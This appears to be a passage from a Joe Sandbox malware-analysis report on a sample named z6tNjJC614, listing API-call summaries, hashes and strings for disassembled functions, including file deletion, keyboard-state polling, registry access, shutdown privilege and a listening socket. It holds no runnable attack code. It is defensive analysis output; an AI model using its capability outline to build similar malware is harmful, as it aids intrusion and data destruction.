                                                                      • Opcode Fuzzy Hash: 14fda3662bff394c9eb512c3e2950a31bb50afe0274e074adf98c31894814093
                                                                      • Instruction Fuzzy Hash: 37028175604612AFDB14EF14C859E6ABBE5FF89310F04885DF85A9B3A2DB30ED41CB81
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0D[$0E[$0F[$3cR$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG[$_R
                                                                      • API String ID: 0-1150986482
                                                                      • Opcode ID: 73a0663444963706923bb967893693d3a8dbc12708511c7bbf8bb8c169bb048a
                                                                      • Instruction ID: 0eea03fccd765623e16c5e3ff0fde0e9845accbb7b4d8b680649dde15e8ebef2
                                                                      • Opcode Fuzzy Hash: 73a0663444963706923bb967893693d3a8dbc12708511c7bbf8bb8c169bb048a
                                                                      • Instruction Fuzzy Hash: 1C726E75E00629DBDB14CF59D8907BEBBB5FF49310F14856AE806EB290EB309D81CB94
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0057F113
                                                                      • _wcscmp.LIBCMT ref: 0057F128
                                                                      • _wcscmp.LIBCMT ref: 0057F13F
                                                                        • Part of subcall function 00574385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 005743A0
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0057F16E
                                                                      • FindClose.KERNEL32(00000000), ref: 0057F179
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0057F195
                                                                      • _wcscmp.LIBCMT ref: 0057F1BC
                                                                      • _wcscmp.LIBCMT ref: 0057F1D3
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0057F1E5
                                                                      • SetCurrentDirectoryW.KERNEL32(005C8920), ref: 0057F203
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0057F20D
                                                                      • FindClose.KERNEL32(00000000), ref: 0057F21A
                                                                      • FindClose.KERNEL32(00000000), ref: 0057F22C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                      • String ID: *.*
                                                                      • API String ID: 1824444939-438819550
                                                                      • Opcode ID: 6364542311f360a4ca883d5aad9717689d42ae091c3f0bc1a8dc61df50eea8c0
                                                                      • Instruction ID: c5d35e3c2caa008f5a5c2bd9a8a733f9008bc65f6e1bb25a095cc5c6a1cb7ed8
                                                                      • Opcode Fuzzy Hash: 6364542311f360a4ca883d5aad9717689d42ae091c3f0bc1a8dc61df50eea8c0
                                                                      • Instruction Fuzzy Hash: A731843A500219AADF10DFA4FC49EEE7BACBF45360F154176E808E2191DB30DE55EB54
                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0057A20F
                                                                      • __swprintf.LIBCMT ref: 0057A231
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0057A26E
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0057A293
                                                                      • _memset.LIBCMT ref: 0057A2B2
                                                                      • _wcsncpy.LIBCMT ref: 0057A2EE
                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0057A323
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0057A32E
                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 0057A337
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0057A341
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                      • String ID: :$\$\??\%s
                                                                      • API String ID: 2733774712-3457252023
                                                                      • Opcode ID: ca4665ec71a795b3a0cef74adcdade2901f2f9d0f1550bf75777aee501d33547
                                                                      • Instruction ID: 0a5a17f66e92ab7a5fe03749037186bca7d33e829935a9fd083553db437e914b
                                                                      • Opcode Fuzzy Hash: ca4665ec71a795b3a0cef74adcdade2901f2f9d0f1550bf75777aee501d33547
                                                                      • Instruction Fuzzy Hash: CB31ADB590410AABDB209FA0EC49FEF3BBCBFC8700F1044B6F508D6161EB7096449B25
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 00570097
                                                                      • SetKeyboardState.USER32(?), ref: 00570102
                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00570122
                                                                      • GetKeyState.USER32(000000A0), ref: 00570139
                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00570168
                                                                      • GetKeyState.USER32(000000A1), ref: 00570179
                                                                      • GetAsyncKeyState.USER32(00000011), ref: 005701A5
                                                                      • GetKeyState.USER32(00000011), ref: 005701B3
                                                                      • GetAsyncKeyState.USER32(00000012), ref: 005701DC
                                                                      • GetKeyState.USER32(00000012), ref: 005701EA
                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00570213
                                                                      • GetKeyState.USER32(0000005B), ref: 00570221
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      • Opcode ID: f80578cbb7fc235885292e25db63278a8682e785ad5a488b1f17e2bb632909a7
                                                                      • Instruction ID: 9bc239c6db07efc6961f0c7d666351a05703eec980cd586a2e2e64bc62a72c09
                                                                      • Opcode Fuzzy Hash: f80578cbb7fc235885292e25db63278a8682e785ad5a488b1f17e2bb632909a7
                                                                      • Instruction Fuzzy Hash: 12512F30904788A9FB31DB60A8187EABFF4AF01380F48D59DD5C9571C3DAA49B8CD761
                                                                      APIs
                                                                        • Part of subcall function 00590E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0058FDAD,?,?), ref: 00590E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005904AC
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0059054B
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 005905E3
                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00590822
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0059082F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 1240663315-0
                                                                      • Opcode ID: 6c092a380e8e2221669759fc02c19deba64638e47842baa2cf4311fa87822118
                                                                      • Instruction ID: 24038dea9ea8497685f6067eb8842c06ab6d2342988c6cd2b98792a06d7c3e42
                                                                      • Opcode Fuzzy Hash: 6c092a380e8e2221669759fc02c19deba64638e47842baa2cf4311fa87822118
                                                                      • Instruction Fuzzy Hash: 99E14D31604215AFCB14DF28C995D6ABBE8FF89314F04896DF84ADB2A1DB30ED45CB91
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                      • String ID:
                                                                      • API String ID: 1737998785-0
                                                                      • Opcode ID: 76ebfe20fffc2341706a9d8ffe5c080b855d7a87e601652dce96b8e6b8c420ce
                                                                      • Instruction ID: 5d9d4197082ea621116cefcc20ba1ca52489c06048486a5ce2e97affab2d2abf
                                                                      • Opcode Fuzzy Hash: 76ebfe20fffc2341706a9d8ffe5c080b855d7a87e601652dce96b8e6b8c420ce
                                                                      • Instruction Fuzzy Hash: 62218035200212AFDB10AF24DC19B697FA8FF65710F118426FD46DB261DB30A845DB94
                                                                      APIs
                                                                        • Part of subcall function 00514750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00514743,?,?,005137AE,?), ref: 00514770
                                                                        • Part of subcall function 00574A31: GetFileAttributesW.KERNEL32(?,0057370B), ref: 00574A32
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 005738A3
                                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0057394B
                                                                      • MoveFileW.KERNEL32(?,?), ref: 0057395E
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0057397B
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0057399D
                                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 005739B9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 4002782344-1173974218
                                                                      • Opcode ID: 049a79935da6f01e2d97f3af0d82d647f0a68f594c2d04388b577739f7429d1b
                                                                      • Instruction ID: 856c37c9b136494e88de9a96cb087785964c29b9577b8012e884f672abff6919
                                                                      • Opcode Fuzzy Hash: 049a79935da6f01e2d97f3af0d82d647f0a68f594c2d04388b577739f7429d1b
                                                                      • Instruction Fuzzy Hash: 1951A03180514E9ADF01EBA4E9969EDBF78BF94310F604069F40AB6191EB306F49EB51
                                                                      APIs
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0057F440
                                                                      • Sleep.KERNEL32(0000000A), ref: 0057F470
                                                                      • _wcscmp.LIBCMT ref: 0057F484
                                                                      • _wcscmp.LIBCMT ref: 0057F49F
                                                                      • FindNextFileW.KERNEL32(?,?), ref: 0057F53D
                                                                      • FindClose.KERNEL32(00000000), ref: 0057F553
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                      • String ID: *.*
                                                                      • API String ID: 713712311-438819550
                                                                      • Opcode ID: 26940e1a0f12318550142ef77e0d53cb4fc9870dc010da9cc2899f050270dacb
                                                                      • Instruction ID: 4c17ca467f14e4ed61b0570f5bba769c830148589aaf8a4af8253674155684a4
                                                                      • Opcode Fuzzy Hash: 26940e1a0f12318550142ef77e0d53cb4fc9870dc010da9cc2899f050270dacb
                                                                      • Instruction Fuzzy Hash: DC414F7190021A9FDF14DF64EC49AEEBFB4FF45314F148466E819A3191EB309E94EB90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __itow__swprintf
                                                                      • String ID: 3cR$_R
                                                                      • API String ID: 674341424-502522525
                                                                      • Opcode ID: 3cab9e84e93d8360720c6291af52d6ecaf9707deee90e6016e305f81be74990c
                                                                      • Instruction ID: 1fa1dce97e9f560593d645ccc8065f2456ec4d77e1836617cb16bdb0bca17cb8
                                                                      • Opcode Fuzzy Hash: 3cab9e84e93d8360720c6291af52d6ecaf9707deee90e6016e305f81be74990c
                                                                      • Instruction Fuzzy Hash: 5622BC716083119FDB24EF14D895BAEBBE4BFC5300F40491DF89A97291DB34EA48CB92
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: f1685eaf1c174dd84898e4e05e813468f8b6e58fb0f69d7ecd28464b510ef3fd
                                                                      • Instruction ID: 1a24c796788f001113b0560f81b4741b6593208cd1a47674c8fec1e990ca0c38
                                                                      • Opcode Fuzzy Hash: f1685eaf1c174dd84898e4e05e813468f8b6e58fb0f69d7ecd28464b510ef3fd
                                                                      • Instruction Fuzzy Hash: 8F127A70A00A1ADFDF14DFA5D985AEEBBF5FF88300F104569E806A7290EB35AD54CB50
                                                                      APIs
                                                                        • Part of subcall function 00514750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00514743,?,?,005137AE,?), ref: 00514770
                                                                        • Part of subcall function 00574A31: GetFileAttributesW.KERNEL32(?,0057370B), ref: 00574A32
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00573B89
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00573BD9
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00573BEA
                                                                      • FindClose.KERNEL32(00000000), ref: 00573C01
                                                                      • FindClose.KERNEL32(00000000), ref: 00573C0A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 2649000838-1173974218
                                                                      • Opcode ID: aeae4af7a95eb05137045ce7a4019b2cdd353af979b69eba766a7da4fea35dae
                                                                      • Instruction ID: 050173d00b520582bc8468bdf6afc7fddc69e4eaa4a84ba3b87383e442317267
                                                                      • Opcode Fuzzy Hash: aeae4af7a95eb05137045ce7a4019b2cdd353af979b69eba766a7da4fea35dae
                                                                      • Instruction Fuzzy Hash: 973190310083869BD301EF24D8998EFBBACBE95314F444D2DF4D992191EB209A0CEB97
                                                                      APIs
                                                                        • Part of subcall function 005687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0056882B
                                                                        • Part of subcall function 005687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00568858
                                                                        • Part of subcall function 005687E1: GetLastError.KERNEL32 ref: 00568865
                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 005751F9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                      • String ID: $@$SeShutdownPrivilege
                                                                      • API String ID: 2234035333-194228
                                                                      • Opcode ID: ef597f577e8841f6f4405ee1819e8cc615f420e2f9fd54506ac6aee034710b63
                                                                      • Instruction ID: 9901392190b7b87f123a6140d0ef04c79b407e782c4167a6a7389d8d059a3c1c
                                                                      • Opcode Fuzzy Hash: ef597f577e8841f6f4405ee1819e8cc615f420e2f9fd54506ac6aee034710b63
                                                                      • Instruction Fuzzy Hash: F601FC397916115BE7285264BC4EFBA7E58F705341F618925F90FD20D3F9D21C00A690
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 005862DC
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005862EB
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00586307
                                                                      • listen.WSOCK32(00000000,00000005), ref: 00586316
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00586330
                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00586344
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                                      • String ID:
                                                                      • API String ID: 1279440585-0
                                                                      • Opcode ID: 86f24e50ae683f3321400c881debfed238e18650b0641bb2ae14c1090a40f50a
                                                                      • Instruction ID: 7e5344b5b98583df6ee09c611b8e0d680cea40ea40dea21be9e28246b4854850
                                                                      • Opcode Fuzzy Hash: 86f24e50ae683f3321400c881debfed238e18650b0641bb2ae14c1090a40f50a
                                                                      • Instruction Fuzzy Hash: FA21F030600205AFCB10EF64C849BAEBBA8FF88320F254559EC16E7391CB30AD45DB51
                                                                      APIs
                                                                        • Part of subcall function 00530DB6: std::exception::exception.LIBCMT ref: 00530DEC
                                                                        • Part of subcall function 00530DB6: __CxxThrowException@8.LIBCMT ref: 00530E01
                                                                      • _memmove.LIBCMT ref: 00560258
                                                                      • _memmove.LIBCMT ref: 0056036D
                                                                      • _memmove.LIBCMT ref: 00560414
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 1300846289-0
                                                                      • Opcode ID: ddf0cef96eebd6d6894d4cd9aa7ef6061260ef2ec6efbf9bb30ac5879ebfcc6a
                                                                      • Instruction ID: dbf3cacf1afc8e8856ce0ee9dd21b674422f3cbee92c66fb176c086f6a488e59
                                                                      • Opcode Fuzzy Hash: ddf0cef96eebd6d6894d4cd9aa7ef6061260ef2ec6efbf9bb30ac5879ebfcc6a
                                                                      • Instruction Fuzzy Hash: 2102CE70A0021ADFDF04DF64D985AAEBFB5FF88300F148469E806DB291EB31E954CB91
                                                                      APIs
                                                                        • Part of subcall function 00512612: GetWindowLongW.USER32(?,000000EB), ref: 00512623
                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 005119FA
                                                                      • GetSysColor.USER32(0000000F), ref: 00511A4E
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00511A61
                                                                        • Part of subcall function 00511290: DefDlgProcW.USER32(?,00000020,?), ref: 005112D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ColorProc$LongWindow
                                                                      • String ID:
                                                                      • API String ID: 3744519093-0
                                                                      • Opcode ID: f02362a4cda4f93ca8f87ca7e96ee93c29e6ad6a42b8efba58732a1813587d73
                                                                      • Instruction ID: e0b563b06b51ed3f7c4ff0163d7c9af7e1b89e0e97ae1806185f071e8670a1a6
                                                                      • Opcode Fuzzy Hash: f02362a4cda4f93ca8f87ca7e96ee93c29e6ad6a42b8efba58732a1813587d73
                                                                      • Instruction Fuzzy Hash: B1A15971106D45BAFA28AB394C48DFF3E5CFF81385F24095AF602D5192DA24DD80A2FA
                                                                      APIs
                                                                        • Part of subcall function 00587D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00587DB6
                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0058679E
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005867C7
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00586800
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0058680D
                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00586821
                                                                      Memory Dump Source
